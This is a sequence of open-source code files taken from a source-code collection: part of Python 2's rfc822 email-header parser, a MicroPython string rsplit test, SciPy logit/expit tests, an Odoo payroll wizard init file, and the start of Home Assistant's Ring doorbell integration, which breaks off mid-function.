        header value for a given header name, or None if it doesn't exist.
        This uses the dictionary version which finds the *last* such header.
        """
        return self.dict.get(name.lower(), default)
    get = getheader

    def getheaders(self, name):
        """Get all values for a header.

        This returns a list of values for headers given more than once; each
        value in the result list is stripped in the same way as the result of
        getheader().  If the header is not given, return an empty list.
        """
        result = []
        current = ''
        have_header = 0
        for s in self.getallmatchingheaders(name):
            if s[0].isspace():
                # Continuation line: fold into the current value.
                if current:
                    current = "%s\n %s" % (current, s.strip())
                else:
                    current = s.strip()
            else:
                if have_header:
                    result.append(current)
                current = s[s.find(":") + 1:].strip()
                have_header = 1
        if have_header:
            result.append(current)
        return result

    def getaddr(self, name):
        """Get a single address from a header, as a tuple.

        An example return value:
        ('Guido van Rossum', 'guido@cwi.nl')
        """
        # New, by Ben Escoto
        alist = self.getaddrlist(name)
        if alist:
            return alist[0]
        else:
            return (None, None)

    def getaddrlist(self, name):
        """Get a list of addresses from a header.

        Retrieves a list of addresses from a header, where each address is a
        tuple as returned by getaddr().  Scans all named headers, so it works
        properly with multiple To: or Cc: headers for example.
        """
        raw = []
        for h in self.getallmatchingheaders(name):
            if h[0] in ' \t':
                raw.append(h)
            else:
                if raw:
                    # Separate values from distinct header lines.
                    raw.append(', ')
                i = h.find(':')
                if i > 0:
                    addr = h[i+1:]
                raw.append(addr)
        alladdrs = ''.join(raw)
        a = AddressList(alladdrs)
        return a.addresslist

    def getdate(self, name):
        """Retrieve a date field from a header.

        Retrieves a date field from the named header, returning a tuple
        compatible with time.mktime().
        """
        try:
            data = self[name]
        except KeyError:
            return None
        return parsedate(data)

    def getdate_tz(self, name):
        """Retrieve a date field from a header as a 10-tuple.

        The first 9 elements make up a tuple compatible with time.mktime(),
        and the 10th is the offset of the poster's time zone from GMT/UTC.
        """
        try:
            data = self[name]
        except KeyError:
            return None
        return parsedate_tz(data)

    # Access as a dictionary (only finds *last* header of each type):

    def __len__(self):
        """Get the number of headers in a message."""
        return len(self.dict)

    def __getitem__(self, name):
        """Get a specific header, as from a dictionary."""
        return self.dict[name.lower()]

    def __setitem__(self, name, value):
        """Set the value of a header.

        Note: This is not a perfect inversion of __getitem__, because any
        changed headers get stuck at the end of the raw-headers list rather
        than where the altered header was.
        """
        del self[name] # Won't fail if it doesn't exist
        self.dict[name.lower()] = value
        text = name + ": " + value
        for line in text.split("\n"):
            self.headers.append(line + "\n")

    def __delitem__(self, name):
        """Delete all occurrences of a specific header, if it is present."""
        name = name.lower()
        if not name in self.dict:
            return
        del self.dict[name]
        name = name + ':'
        n = len(name)
        lst = []
        hit = 0
        for i in range(len(self.headers)):
            line = self.headers[i]
            if line[:n].lower() == name:
                hit = 1
            elif not line[:1].isspace():
                hit = 0
            if hit:
                lst.append(i)
        # Delete from the end so earlier indices stay valid.
        for i in reversed(lst):
            del self.headers[i]

    def setdefault(self, name, default=""):
        lowername = name.lower()
        if lowername in self.dict:
            return self.dict[lowername]
        else:
            text = name + ": " + default
            for line in text.split("\n"):
                self.headers.append(line + "\n")
            self.dict[lowername] = default
            return default

    def has_key(self, name):
        """Determine whether a message contains the named header."""
        return name.lower() in self.dict

    def __contains__(self, name):
        """Determine whether a message contains the named header."""
        return name.lower() in self.dict

    def __iter__(self):
        return iter(self.dict)

    def keys(self):
        """Get all of a message's header field names."""
        return self.dict.keys()

    def values(self):
        """Get all of a message's header field values."""
        return self.dict.values()

    def items(self):
        """Get all of a message's headers.

        Returns a list of name, value tuples.
        """
        return self.dict.items()

    def __str__(self):
        return ''.join(self.headers)
# Utility functions
# -----------------
# XXX Should fix unquote() and quote() to be really conformant.
# XXX The inverses of the parse functions may also be useful.
def unquote(s):
    """Strip one layer of surrounding quotes or angle brackets, if present."""
    if len(s) < 2:
        return s
    first, last = s[0], s[-1]
    if first == '"' and last == '"':
        # Undo the backslash escaping used inside RFC 2822 quoted-strings.
        inner = s[1:-1]
        return inner.replace('\\\\', '\\').replace('\\"', '"')
    if first == '<' and last == '>':
        return s[1:-1]
    return s
def quote(s):
    """Escape backslashes and double quotes so *s* can sit in a quoted-string."""
    escaped = s.replace('\\', '\\\\')
    return escaped.replace('"', '\\"')
def parseaddr(address):
    """Parse an address into a (realname, mailaddr) tuple."""
    parsed = AddressList(address).addresslist
    # An unparseable/empty field yields the conventional (None, None) pair.
    return parsed[0] if parsed else (None, None)
class AddrlistClass:
    """Address parser class by Ben Escoto.

    To understand what this class does, it helps to have a copy of
    RFC 2822 in front of you.

    http://www.faqs.org/rfcs/rfc2822.html

    Note: this class interface is deprecated and may be removed in the future.
    Use rfc822.AddressList instead.
    """

    def __init__(self, field):
        """Initialize a new instance.

        `field' is an unparsed address header field, containing one or more
        addresses.
        """
        # Recursive-descent parser state: self.pos is the cursor into
        # self.field; the *ends strings list the characters that terminate
        # the token currently being scanned.
        self.specials = '()<>@,:;.\"[]'
        self.pos = 0
        self.LWS = ' \t'
        self.CR = '\r\n'
        self.atomends = self.specials + self.LWS + self.CR
        # Note that RFC 2822 now specifies `.' as obs-phrase, meaning that it
        # is obsolete syntax.  RFC 2822 requires that we recognize obsolete
        # syntax, so allow dots in phrases.
        self.phraseends = self.atomends.replace('.', '')
        self.field = field
        self.commentlist = []

    def gotonext(self):
        """Parse up to the start of the next address."""
        while self.pos < len(self.field):
            if self.field[self.pos] in self.LWS + '\n\r':
                self.pos = self.pos + 1
            elif self.field[self.pos] == '(':
                self.commentlist.append(self.getcomment())
            else: break

    def getaddrlist(self):
        """Parse all addresses.

        Returns a list containing all of the addresses.
        """
        result = []
        ad = self.getaddress()
        while ad:
            result += ad
            ad = self.getaddress()
        return result

    def getaddress(self):
        """Parse the next address."""
        self.commentlist = []
        self.gotonext()

        # Remember where we were so the addrspec branch can re-scan from
        # the start of this address.
        oldpos = self.pos
        oldcl = self.commentlist
        plist = self.getphraselist()

        self.gotonext()
        returnlist = []

        if self.pos >= len(self.field):
            # Bad email address technically, no domain.
            if plist:
                returnlist = [(' '.join(self.commentlist), plist[0])]

        elif self.field[self.pos] in '.@':
            # email address is just an addrspec
            # this isn't very efficient since we start over
            self.pos = oldpos
            self.commentlist = oldcl
            addrspec = self.getaddrspec()
            returnlist = [(' '.join(self.commentlist), addrspec)]

        elif self.field[self.pos] == ':':
            # address is a group
            returnlist = []

            fieldlen = len(self.field)
            self.pos += 1
            while self.pos < len(self.field):
                self.gotonext()
                if self.pos < fieldlen and self.field[self.pos] == ';':
                    self.pos += 1
                    break
                returnlist = returnlist + self.getaddress()

        elif self.field[self.pos] == '<':
            # Address is a phrase then a route addr
            routeaddr = self.getrouteaddr()

            if self.commentlist:
                returnlist = [(' '.join(plist) + ' (' + \
                         ' '.join(self.commentlist) + ')', routeaddr)]
            else: returnlist = [(' '.join(plist), routeaddr)]

        else:
            if plist:
                returnlist = [(' '.join(self.commentlist), plist[0])]
            elif self.field[self.pos] in self.specials:
                # Skip a stray special character rather than looping forever.
                self.pos += 1

        self.gotonext()
        if self.pos < len(self.field) and self.field[self.pos] == ',':
            self.pos += 1
        return returnlist

    def getrouteaddr(self):
        """Parse a route address (Return-path value).

        This method just skips all the route stuff and returns the addrspec.
        """
        if self.field[self.pos] != '<':
            return

        expectroute = 0
        self.pos += 1
        self.gotonext()
        adlist = ""
        while self.pos < len(self.field):
            if expectroute:
                self.getdomain()
                expectroute = 0
            elif self.field[self.pos] == '>':
                self.pos += 1
                break
            elif self.field[self.pos] == '@':
                self.pos += 1
                expectroute = 1
            elif self.field[self.pos] == ':':
                self.pos += 1
            else:
                adlist = self.getaddrspec()
                self.pos += 1
                break
            self.gotonext()

        return adlist

    def getaddrspec(self):
        """Parse an RFC 2822 addr-spec."""
        aslist = []

        self.gotonext()
        while self.pos < len(self.field):
            if self.field[self.pos] == '.':
                aslist.append('.')
                self.pos += 1
            elif self.field[self.pos] == '"':
                aslist.append('"%s"' % self.getquote())
            elif self.field[self.pos] in self.atomends:
                break
            else: aslist.append(self.getatom())

        self.gotonext()
        if self.pos >= len(self.field) or self.field[self.pos] != '@':
            # No domain part: return just the local part collected so far.
            return ''.join(aslist)

        aslist.append('@')
        self.pos += 1
        self.gotonext()
        return ''.join(aslist) + self.getdomain()

    def getdomain(self):
        """Get the complete domain name from an address."""
        sdlist = []
        while self.pos < len(self.field):
            if self.field[self.pos] in self.LWS:
                self.pos += 1
            elif self.field[self.pos] == '(':
                self.commentlist.append(self.getcomment())
            elif self.field[self.pos] == '[':
                sdlist.append(self.getdomainliteral())
            elif self.field[self.pos] == '.':
                self.pos += 1
                sdlist.append('.')
            elif self.field[self.pos] in self.atomends:
                break
            else: sdlist.append(self.getatom())
        return ''.join(sdlist)

    def getdelimited(self, beginchar, endchars, allowcomments = 1):
        """Parse a header fragment delimited by special characters.

        `beginchar' is the start character for the fragment.  If self is not
        looking at an instance of `beginchar' then getdelimited returns the
        empty string.

        `endchars' is a sequence of allowable end-delimiting characters.
        Parsing stops when one of these is encountered.

        If `allowcomments' is non-zero, embedded RFC 2822 comments are allowed
        within the parsed fragment.
        """
        if self.field[self.pos] != beginchar:
            return ''

        slist = ['']
        quote = 0   # set after a backslash: next char is taken literally
        self.pos += 1
        while self.pos < len(self.field):
            if quote == 1:
                slist.append(self.field[self.pos])
                quote = 0
            elif self.field[self.pos] in endchars:
                self.pos += 1
                break
            elif allowcomments and self.field[self.pos] == '(':
                slist.append(self.getcomment())
                continue        # have already advanced pos from getcomment
            elif self.field[self.pos] == '\\':
                quote = 1
            else:
                slist.append(self.field[self.pos])
            self.pos += 1

        return ''.join(slist)

    def getquote(self):
        """Get a quote-delimited fragment from self's field."""
        return self.getdelimited('"', '"\r', 0)

    def getcomment(self):
        """Get a parenthesis-delimited fragment from self's field."""
        return self.getdelimited('(', ')\r', 1)

    def getdomainliteral(self):
        """Parse an RFC 2822 domain-literal."""
        return '[%s]' % self.getdelimited('[', ']\r', 0)

    def getatom(self, atomends=None):
        """Parse an RFC 2822 atom.

        Optional atomends specifies a different set of end token delimiters
        (the default is to use self.atomends).  This is used e.g. in
        getphraselist() since phrase endings must not include the `.' (which
        is legal in phrases)."""
        atomlist = ['']
        if atomends is None:
            atomends = self.atomends

        while self.pos < len(self.field):
            if self.field[self.pos] in atomends:
                break
            else: atomlist.append(self.field[self.pos])
            self.pos += 1

        return ''.join(atomlist)

    def getphraselist(self):
        """Parse a sequence of RFC 2822 phrases.

        A phrase is a sequence of words, which are in turn either RFC 2822
        atoms or quoted-strings.  Phrases are canonicalized by squeezing all
        runs of continuous whitespace into one space.
        """
        plist = []

        while self.pos < len(self.field):
            if self.field[self.pos] in self.LWS:
                self.pos += 1
            elif self.field[self.pos] == '"':
                plist.append(self.getquote())
            elif self.field[self.pos] == '(':
                self.commentlist.append(self.getcomment())
            elif self.field[self.pos] in self.phraseends:
                break
            else:
                plist.append(self.getatom(self.phraseends))

        return plist
class AddressList(AddrlistClass):
    """An AddressList encapsulates a list of parsed RFC 2822 addresses."""

    def __init__(self, field):
        AddrlistClass.__init__(self, field)
        # A false field (None/empty) parses to no addresses at all.
        self.addresslist = self.getaddrlist() if field else []

    def __len__(self):
        return len(self.addresslist)

    def __str__(self):
        return ", ".join(map(dump_address_pair, self.addresslist))

    def __add__(self, other):
        # Set union
        union = AddressList(None)
        union.addresslist = list(self.addresslist)
        for addr in other.addresslist:
            if addr not in self.addresslist:
                union.addresslist.append(addr)
        return union

    def __iadd__(self, other):
        # Set union, in-place
        for addr in other.addresslist:
            if addr not in self.addresslist:
                self.addresslist.append(addr)
        return self

    def __sub__(self, other):
        # Set difference
        difference = AddressList(None)
        difference.addresslist = [addr for addr in self.addresslist
                                  if addr not in other.addresslist]
        return difference

    def __isub__(self, other):
        # Set difference, in-place
        for addr in other.addresslist:
            if addr in self.addresslist:
                self.addresslist.remove(addr)
        return self

    def __getitem__(self, index):
        # Make indexing, slices, and 'in' work
        return self.addresslist[index]
def dump_address_pair(pair):
    """Dump a (name, address) pair in a canonicalized form."""
    name, addr = pair[0], pair[1]
    if not name:
        # No display name: the bare address is the canonical form.
        return addr
    return '"' + name + '" <' + addr + '>'
# Parse a date field

_monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul',
               'aug', 'sep', 'oct', 'nov', 'dec',
               'january', 'february', 'march', 'april', 'may', 'june', 'july',
               'august', 'september', 'october', 'november', 'december']
_daynames = ['mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun']

# The timezone table does not include the military time zones defined
# in RFC822, other than Z.  According to RFC1123, the description in
# RFC822 gets the signs wrong, so we can't rely on any such time
# zones.  RFC1123 recommends that numeric timezone indicators be used
# instead of timezone names.

_timezones = {'UT':0, 'UTC':0, 'GMT':0, 'Z':0,
              'AST': -400, 'ADT': -300,  # Atlantic (used in Canada)
              'EST': -500, 'EDT': -400,  # Eastern
              'CST': -600, 'CDT': -500,  # Central
              'MST': -700, 'MDT': -600,  # Mountain
              'PST': -800, 'PDT': -700   # Pacific
              }


def parsedate_tz(data):
    """Convert a date string to a time tuple.

    Accounts for military timezones.

    Returns a 10-tuple whose first 9 items are compatible with
    time.mktime(); the 10th is the timezone offset from UTC in seconds,
    or None if no recognizable zone was given.  Returns None if the
    string cannot be parsed at all.
    """
    if not data:
        return None
    data = data.split()
    if not data:
        # Whitespace-only input splits to []; without this guard the
        # data[0] access below would raise IndexError.
        return None
    if data[0][-1] in (',', '.') or data[0].lower() in _daynames:
        # There's a dayname here. Skip it
        del data[0]
    else:
        # no space after the "weekday,"?
        i = data[0].rfind(',')
        if i >= 0:
            data[0] = data[0][i+1:]
    if len(data) == 3: # RFC 850 date, deprecated
        stuff = data[0].split('-')
        if len(stuff) == 3:
            data = stuff + data[1:]
    if len(data) == 4:
        s = data[3]
        i = s.find('+')
        if i > 0:
            # Split a fused "time+zone" token.
            data[3:] = [s[:i], s[i+1:]]
        else:
            data.append('') # Dummy tz
    if len(data) < 5:
        return None
    data = data[:5]
    [dd, mm, yy, tm, tz] = data
    mm = mm.lower()
    if not mm in _monthnames:
        # Day and month may be swapped ("Nov 06" vs "06 Nov").
        dd, mm = mm, dd.lower()
        if not mm in _monthnames:
            return None
    mm = _monthnames.index(mm)+1
    if mm > 12: mm = mm - 12    # full month names follow the 12 abbreviations
    if dd[-1] == ',':
        dd = dd[:-1]
    i = yy.find(':')
    if i > 0:
        # The time appears where the year should be; swap them.
        yy, tm = tm, yy
    if yy[-1] == ',':
        yy = yy[:-1]
    if not yy[0].isdigit():
        # Year and timezone appear swapped; swap them back.
        yy, tz = tz, yy
    if tm[-1] == ',':
        tm = tm[:-1]
    tm = tm.split(':')
    if len(tm) == 2:
        [thh, tmm] = tm
        tss = '0'
    elif len(tm) == 3:
        [thh, tmm, tss] = tm
    else:
        return None
    try:
        yy = int(yy)
        dd = int(dd)
        thh = int(thh)
        tmm = int(tmm)
        tss = int(tss)
    except ValueError:
        return None
    tzoffset = None
    tz = tz.upper()
    if tz in _timezones:
        tzoffset = _timezones[tz]
    else:
        try:
            tzoffset = int(tz)
        except ValueError:
            pass
    # Convert a timezone offset into seconds ; -0500 -> -18000
    if tzoffset:
        if tzoffset < 0:
            tzsign = -1
            tzoffset = -tzoffset
        else:
            tzsign = 1
        tzoffset = tzsign * ( (tzoffset//100)*3600 + (tzoffset % 100)*60)
    return (yy, mm, dd, thh, tmm, tss, 0, 1, 0, tzoffset)


def parsedate(data):
    """Convert a time string to a 9-tuple compatible with time.mktime()."""
    t = parsedate_tz(data)
    if t is None:
        return t
    # Drop the timezone offset from the 10-tuple.
    return t[:9]
def mktime_tz(data):
    """Turn a 10-tuple as returned by parsedate_tz() into a UTC timestamp."""
    tzoffset = data[9]
    if tzoffset is None:
        # No zone info, so localtime is better assumption than GMT
        return time.mktime(data[:8] + (-1,))
    # Interpret as local standard time, then remove both the local offset
    # and the message's own offset to land on a UTC epoch value.
    local = time.mktime(data[:8] + (0,))
    return local - tzoffset - time.timezone
def formatdate(timeval=None):
    """Returns time format preferred for Internet standards.

    Sun, 06 Nov 1994 08:49:37 GMT  ; RFC 822, updated by RFC 1123

    According to RFC 1123, day and month names must always be in
    English.  If not for that, this code could use strftime().  It
    can't because strftime() honors the locale and could generated
    non-English names.
    """
    if timeval is None:
        timeval = time.time()
    tm = time.gmtime(timeval)
    days = ("Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun")
    months = ("Jan", "Feb", "Mar", "Apr", "May", "Jun",
              "Jul", "Aug", "Sep", "Oct", "Nov", "Dec")
    return "%s, %02d %s %04d %02d:%02d:%02d GMT" % (
        days[tm[6]], tm[2], months[tm[1] - 1],
        tm[0], tm[3], tm[4], tm[5])
# When used as script, run a small test program.
# The first command line argument must be a filename containing one
# message in RFC-822 format.
# NOTE: this demo uses Python 2 print statements, like the rest of the
# module (rfc822 was removed in Python 3).

if __name__ == '__main__':
    import sys, os
    # Default to the conventional MH inbox location unless a path is given.
    file = os.path.join(os.environ['HOME'], 'Mail/inbox/1')
    if sys.argv[1:]: file = sys.argv[1]
    f = open(file, 'r')
    m = Message(f)
    print 'From:', m.getaddr('from')
    print 'To:', m.getaddrlist('to')
    print 'Subject:', m.getheader('subject')
    print 'Date:', m.getheader('date')
    date = m.getdate_tz('date')
    tz = date[-1]
    date = time.localtime(mktime_tz(date))
    if date:
        print 'ParsedDate:', time.asctime(date),
        # Render the zone offset (seconds) as +HHMM[.SS].
        hhmmss = tz
        hhmm, ss = divmod(hhmmss, 60)
        hh, mm = divmod(hhmm, 60)
        print "%+03d%02d" % (hh, mm),
        if ss: print ".%02d" % ss,
        print
    else:
        print 'ParsedDate:', None
    m.rewindbody()
    n = 0
    while f.readline():
        n += 1
    print 'Lines:', n
    print '-'*70
    print 'len =', len(m)
    if 'Date' in m: print 'Date =', m['Date']
    if 'X-Nonsense' in m: pass
    print 'keys =', m.keys()
    print 'values =', m.values()
    print 'items =', m.items()
| gpl-3.0 |
martinribelotta/micropython | tests/basics/string_rsplit.py | 55 | 1413 | # default separator (whitespace)
# Test harness compares this script's printed output against CPython's,
# so every case is exercised via print().

# default separator (whitespace)
print("a b".rsplit())
#print("   a   b   ".rsplit(None))
#print("   a   b   ".rsplit(None, 1))
#print("   a   b   ".rsplit(None, 2))
#print("   a   b   c".rsplit(None, 1))
#print("   a   b   c".rsplit(None, 0))
#print("   a   b   c".rsplit(None, -1))

# empty separator should fail (this actually delegates to .split())
try:
    "abc".rsplit('')
except ValueError:
    print("ValueError")

# empty separator should fail (error handled in .rsplit())
try:
    'a a a a'.rsplit('', 5)
except ValueError:
    print('ValueError')

# bad separator type
try:
    'a a a a'.rsplit(1)
except TypeError:
    print('TypeError')

# non-empty separator
print("abc".rsplit("a"))
print("abc".rsplit("b"))
print("abc".rsplit("c"))
print("abc".rsplit("z"))
print("abc".rsplit("ab"))
print("abc".rsplit("bc"))
print("abc".rsplit("abc"))
print("abc".rsplit("abcd"))
print("abcabc".rsplit("bc"))
print("abcabc".rsplit("bc", 0))
print("abcabc".rsplit("bc", 1))
print("abcabc".rsplit("bc", 2))

# maxsplit at and beyond the number of separators present
print("10/11/12".rsplit("/", 1))
print("10/11/12".rsplit("/", 2))
print("10/11/12".rsplit("/", 3))
print("10/11/12".rsplit("/", 4))
print("10/11/12".rsplit("/", 5))
print("/*10/*11/*12/*".rsplit("/*", 1))
print("/*10/*11/*12/*".rsplit("/*", 2))
print("/*10/*11/*12/*".rsplit("/*", 3))
print("/*10/*11/*12/*".rsplit("/*", 4))
print("/*10/*11/*12/*".rsplit("/*", 5))

# bytes separator on a bytes object
print(b"abcabc".rsplit(b"bc", 2))
| mit |
jsilter/scipy | scipy/special/tests/test_logit.py | 110 | 2925 | from __future__ import division, print_function, absolute_import
import numpy as np
from numpy.testing import (TestCase, assert_equal, assert_almost_equal,
assert_allclose)
from scipy.special import logit, expit
class TestLogit(TestCase):
    def check_logit_out(self, dtype, expected):
        # logit over [0, 1]; the endpoints map to -inf/+inf, so divide
        # warnings are suppressed for the duration of the call.
        a = np.linspace(0,1,10)
        a = np.array(a, dtype=dtype)
        olderr = np.seterr(divide='ignore')
        try:
            actual = logit(a)
        finally:
            np.seterr(**olderr)

        assert_almost_equal(actual, expected)

        # The result dtype must match the input dtype.
        assert_equal(actual.dtype, np.dtype(dtype))

    def test_float32(self):
        expected = np.array([-np.inf, -2.07944155,
                            -1.25276291, -0.69314718,
                            -0.22314353, 0.22314365,
                            0.6931473, 1.25276303,
                            2.07944155, np.inf], dtype=np.float32)
        self.check_logit_out('f4', expected)

    def test_float64(self):
        expected = np.array([-np.inf, -2.07944154,
                            -1.25276297, -0.69314718,
                            -0.22314355, 0.22314355,
                            0.69314718, 1.25276297,
                            2.07944154, np.inf])
        self.check_logit_out('f8', expected)

    def test_nan(self):
        # logit is undefined outside [0, 1] and should return nan there;
        # suppress the invalid-value warning while computing.
        expected = np.array([np.nan]*4)
        olderr = np.seterr(invalid='ignore')
        try:
            actual = logit(np.array([-3., -2., 2., 3.]))
        finally:
            np.seterr(**olderr)

        assert_equal(expected, actual)
class TestExpit(TestCase):
    def check_expit_out(self, dtype, expected):
        # expit over a symmetric range; no warnings expected here.
        a = np.linspace(-4,4,10)
        a = np.array(a, dtype=dtype)
        actual = expit(a)
        assert_almost_equal(actual, expected)
        # The result dtype must match the input dtype.
        assert_equal(actual.dtype, np.dtype(dtype))

    def test_float32(self):
        expected = np.array([0.01798621, 0.04265125,
                            0.09777259, 0.20860852,
                            0.39068246, 0.60931754,
                            0.79139149, 0.9022274,
                            0.95734876, 0.98201376], dtype=np.float32)
        self.check_expit_out('f4',expected)

    def test_float64(self):
        expected = np.array([0.01798621, 0.04265125,
                            0.0977726, 0.20860853,
                            0.39068246, 0.60931754,
                            0.79139147, 0.9022274,
                            0.95734875, 0.98201379])
        self.check_expit_out('f8', expected)

    def test_large(self):
        # For large |x|, expit must saturate to exactly 1.0 / 0.0 without
        # overflowing, across all supported float widths.
        for dtype in (np.float32, np.float64, np.longdouble):
            for n in (88, 89, 709, 710, 11356, 11357):
                n = np.array(n, dtype=dtype)
                assert_allclose(expit(n), 1.0, atol=1e-20)
                assert_allclose(expit(-n), 0.0, atol=1e-20)
                assert_equal(expit(n).dtype, dtype)
                assert_equal(expit(-n).dtype, dtype)
| bsd-3-clause |
fuselock/odoo | addons/hr_payroll/wizard/__init__.py | 442 | 1159 | #-*- coding:utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# d$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import hr_payroll_payslips_by_employees
import hr_payroll_contribution_register_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
turbokongen/home-assistant | homeassistant/components/ring/__init__.py | 9 | 9817 | """Support for Ring Doorbell/Chimes."""
import asyncio
from datetime import timedelta
from functools import partial
import logging
from pathlib import Path
from typing import Optional
from oauthlib.oauth2 import AccessDeniedError
import requests
from ring_doorbell import Auth, Ring
from homeassistant.const import __version__
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.event import async_track_time_interval
from homeassistant.util.async_ import run_callback_threadsafe
# Module-level logger for the Ring integration.
_LOGGER = logging.getLogger(__name__)

ATTRIBUTION = "Data provided by Ring.com"

NOTIFICATION_ID = "ring_notification"
NOTIFICATION_TITLE = "Ring Setup"

DOMAIN = "ring"
DEFAULT_ENTITY_NAMESPACE = "ring"

# Entity platforms that receive the config entry in async_setup_entry.
PLATFORMS = ("binary_sensor", "light", "sensor", "switch", "camera")
async def async_setup(hass, config):
    """Set up the Ring component."""
    if DOMAIN in config:

        def _remove_legacy_cache():
            """Delete the pre-config-entry token cache file, if present."""
            cache_path = Path(hass.config.path(".ring_cache.pickle"))
            if cache_path.is_file():
                cache_path.unlink()

        # File-system access is blocking, so run it in the executor.
        await hass.async_add_executor_job(_remove_legacy_cache)

    return True
async def async_setup_entry(hass, entry):
    """Set up a config entry."""

    def token_updater(token):
        """Handle from sync context when token is updated."""
        # Invoked by the ring_doorbell library from a worker thread; hop
        # back onto the event loop to persist the refreshed OAuth token.
        run_callback_threadsafe(
            hass.loop,
            partial(
                hass.config_entries.async_update_entry,
                entry,
                data={**entry.data, "token": token},
            ),
        ).result()

    auth = Auth(f"HomeAssistant/{__version__}", entry.data["token"], token_updater)
    ring = Ring(auth)

    try:
        # Initial fetch uses blocking HTTP (requests); run in the executor.
        await hass.async_add_executor_job(ring.update_data)
    except AccessDeniedError:
        _LOGGER.error("Access token is no longer valid. Please set up Ring again")
        return False

    # Per-entry shared state consumed by the platform modules.
    hass.data.setdefault(DOMAIN, {})[entry.entry_id] = {
        "api": ring,
        "devices": ring.devices(),
        "device_data": GlobalDataUpdater(
            hass, "device", entry.entry_id, ring, "update_devices", timedelta(minutes=1)
        ),
        "dings_data": GlobalDataUpdater(
            hass,
            "active dings",
            entry.entry_id,
            ring,
            "update_dings",
            timedelta(seconds=5),
        ),
        "history_data": DeviceDataUpdater(
            hass,
            "history",
            entry.entry_id,
            ring,
            lambda device: device.history(limit=10),
            timedelta(minutes=1),
        ),
        "health_data": DeviceDataUpdater(
            hass,
            "health",
            entry.entry_id,
            ring,
            lambda device: device.update_health_data(),
            timedelta(minutes=1),
        ),
    }

    for component in PLATFORMS:
        hass.async_create_task(
            hass.config_entries.async_forward_entry_setup(entry, component)
        )

    # The "update" service is shared by all entries; register it only once.
    if hass.services.has_service(DOMAIN, "update"):
        return True

    async def async_refresh_all(_):
        """Refresh all ring data."""
        for info in hass.data[DOMAIN].values():
            await info["device_data"].async_refresh_all()
            await info["dings_data"].async_refresh_all()
            # The device-level updaters are synchronous; run off-loop.
            await hass.async_add_executor_job(info["history_data"].refresh_all)
            await hass.async_add_executor_job(info["health_data"].refresh_all)

    # register service
    hass.services.async_register(DOMAIN, "update", async_refresh_all)

    return True
async def async_unload_entry(hass, entry):
    """Unload Ring entry."""
    # Unload every forwarded platform concurrently; all must succeed.
    results = await asyncio.gather(
        *(
            hass.config_entries.async_forward_entry_unload(entry, platform)
            for platform in PLATFORMS
        )
    )
    if not all(results):
        return False

    hass.data[DOMAIN].pop(entry.entry_id)

    if hass.data[DOMAIN]:
        return True

    # Last entry unloaded, clean up service
    hass.services.async_remove(DOMAIN, "update")

    return True
class GlobalDataUpdater:
    """Data storage for single API endpoint."""

    def __init__(
        self,
        hass: HomeAssistant,
        data_type: str,
        config_entry_id: str,
        ring: Ring,
        update_method: str,
        update_interval: timedelta,
    ):
        """Initialize global data updater.

        data_type is a human-readable label used only in log messages;
        update_method is the *name* of the Ring method to call.
        """
        self.hass = hass
        self.data_type = data_type
        self.config_entry_id = config_entry_id
        self.ring = ring
        self.update_method = update_method
        self.update_interval = update_interval
        self.listeners = []  # callbacks notified after each successful refresh
        self._unsub_interval = None  # cancels the polling timer while set

    @callback
    def async_add_listener(self, update_callback):
        """Listen for data updates."""
        # This is the first listener, set up interval.
        if not self.listeners:
            self._unsub_interval = async_track_time_interval(
                self.hass, self.async_refresh_all, self.update_interval
            )

        self.listeners.append(update_callback)

    @callback
    def async_remove_listener(self, update_callback):
        """Remove data update."""
        self.listeners.remove(update_callback)

        # Last listener gone: stop polling until someone subscribes again.
        if not self.listeners:
            self._unsub_interval()
            self._unsub_interval = None

    async def async_refresh_all(self, _now: Optional[int] = None) -> None:
        """Time to update."""
        # No subscribers means nobody cares about fresh data; skip the call.
        if not self.listeners:
            return

        try:
            # The Ring API call is blocking; dispatch it to the executor.
            await self.hass.async_add_executor_job(
                getattr(self.ring, self.update_method)
            )
        except AccessDeniedError:
            # Token cannot be refreshed: unload the entry so the user
            # is prompted to re-authenticate.
            _LOGGER.error("Ring access token is no longer valid. Set up Ring again")
            await self.hass.config_entries.async_unload(self.config_entry_id)
            return
        except requests.Timeout:
            _LOGGER.warning(
                "Time out fetching Ring %s data",
                self.data_type,
            )
            return
        except requests.RequestException as err:
            _LOGGER.warning(
                "Error fetching Ring %s data: %s",
                self.data_type,
                err,
            )
            return

        for update_callback in self.listeners:
            update_callback()
class DeviceDataUpdater:
    """Data storage for device data."""

    def __init__(
        self,
        hass: HomeAssistant,
        data_type: str,
        config_entry_id: str,
        ring: Ring,
        update_method: str,
        update_interval: timedelta,
    ):
        """Initialize device data updater."""
        # NOTE(review): despite the ``str`` annotation, callers pass a
        # callable taking a device (see async_setup_entry) — confirm and
        # fix the annotation.
        self.data_type = data_type
        self.hass = hass
        self.config_entry_id = config_entry_id
        self.ring = ring
        self.update_method = update_method
        self.update_interval = update_interval
        # device_id -> {"device", "update_callbacks", "data", optional "task"}
        self.devices = {}
        self._unsub_interval = None

    async def async_track_device(self, device, update_callback):
        """Track a device."""
        # First tracked device starts the shared polling interval.
        if not self.devices:
            self._unsub_interval = async_track_time_interval(
                self.hass, self.refresh_all, self.update_interval
            )

        if device.device_id not in self.devices:
            self.devices[device.device_id] = {
                "device": device,
                "update_callbacks": [update_callback],
                "data": None,
            }
            # Store task so that other concurrent requests can wait for us to finish and
            # data be available.
            self.devices[device.device_id]["task"] = asyncio.current_task()
            self.devices[device.device_id][
                "data"
            ] = await self.hass.async_add_executor_job(self.update_method, device)
            self.devices[device.device_id].pop("task")
        else:
            self.devices[device.device_id]["update_callbacks"].append(update_callback)
            # If someone is currently fetching data as part of the initialization, wait for them
            if "task" in self.devices[device.device_id]:
